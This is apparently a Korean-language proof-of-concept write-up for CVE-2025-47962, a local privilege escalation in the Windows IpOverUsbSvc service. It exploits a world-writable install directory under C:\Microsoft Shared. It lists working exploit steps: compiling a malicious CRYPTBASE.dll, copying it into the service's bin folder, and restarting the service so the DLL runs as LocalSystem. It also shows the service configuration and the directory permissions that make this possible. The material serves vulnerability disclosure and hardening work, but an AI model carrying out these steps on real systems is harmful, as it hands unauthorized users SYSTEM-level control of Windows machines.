
CVE-2025-47962에 대한 개념 증명으로, Windows IpOverUsbSvc 서비스의 안전하지 않은 디렉터리 권한으로 인한 DLL 하이재킹을 통해 로컬 권한 상승을 시연합니다.
재현 과정:
i686-w64-mingw32-gcc -shared -o CRYPTBASE.dll poc.c -lkernel32
copy CRYPTBASE.dll "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\CRYPTBASE.dll"
net stop IpOverUsbSvc
net start IpOverUsbSvc

설명: IpOverUsbSvc
sc.exe qc IpOverUsbSvc
SERVICE_NAME: IpOverUsbSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
BINARY_PATH_NAME : "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe"
SERVICE_START_NAME : LocalSystem
LocalSystem 권한으로 실행됩니다. 실행 파일은 C:\Microsoft Shared\ 디렉터리에 있으며, 일반 사용자가 해당 디렉터리에 대해 완전한 제어 권한을 가지고 있습니다.
일반 사용자가 SYSTEM 서비스 디렉터리에 파일을 쓸 수 있다는 사실이 발견되었습니다.
그런 다음 DLL을 모니터링합니다.

Windows SDK 설치 시 생성된 C:\Microsoft Shared\ 디렉터리의 권한이 부적절하게 구성되어 있습니다:
C:\Microsoft Shared BUILTIN\Users:(I)(OI)(CI)(F)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(M)